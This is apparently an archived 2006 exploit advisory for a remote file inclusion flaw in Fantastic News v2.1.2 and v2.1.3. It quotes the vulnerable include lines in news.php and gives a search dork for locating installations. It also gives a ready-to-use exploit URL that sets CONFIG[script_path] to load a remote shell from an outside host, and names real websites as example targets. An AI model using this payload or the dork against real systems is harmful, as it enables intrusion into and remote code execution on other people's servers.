47 lines
No EOL
1.7 KiB
Text
47 lines
No EOL
1.7 KiB
Text
#==============================================================================================
|
|
#Fantastic News <= v2.1.3 (CONFIG[script_path]) Remote File Inclusion Exploit
|
|
#===============================================================================================
|
|
#
|
|
#Critical Level : Dangerous
|
|
#
|
|
#Venedor site : http://fscripts.com/
|
|
#
|
|
#Version : v2.1.2 & v2.1.3
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#Dork : "Powered by Fantastic News v2.1.2" or "Powered by Fantastic News v2.1.3"
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#Bug in : news.php
|
|
#
|
|
#Vlu Code :
|
|
#--------------------------------
|
|
# require_once($CONFIG['script_path']."config.php");
|
|
# require_once($CONFIG['script_path']."functions/functions.php");
|
|
# require_once($CONFIG['script_path']."functions/mysql.php");
|
|
# require_once($CONFIG['script_path']."functions/template.php");
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#Exploit :
|
|
#--------------------------------
|
|
#
|
|
#http://sitename.com/[Script Path]/news.php?CONFIG[script_path]=http://SHELLURL.COM?
|
|
#
|
|
#Example :
|
|
# http://fscripts.com/ ====> vendor site =)) hahahahaaaaaa ====> 2.1.3
|
|
# http://lnx.evanescencewebsite.com/PressArchive =====> 2.1.2
|
|
#
|
|
#
|
|
#
|
|
#================================================================================================
|
|
#Discoverd By : SHiKaA
|
|
#
|
|
#Conatact : SHiKaA-[at]hotmail.com
|
|
#
|
|
#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)
|
|
==================================================================================================
|
|
|
|
# milw0rm.com [2006-08-19] |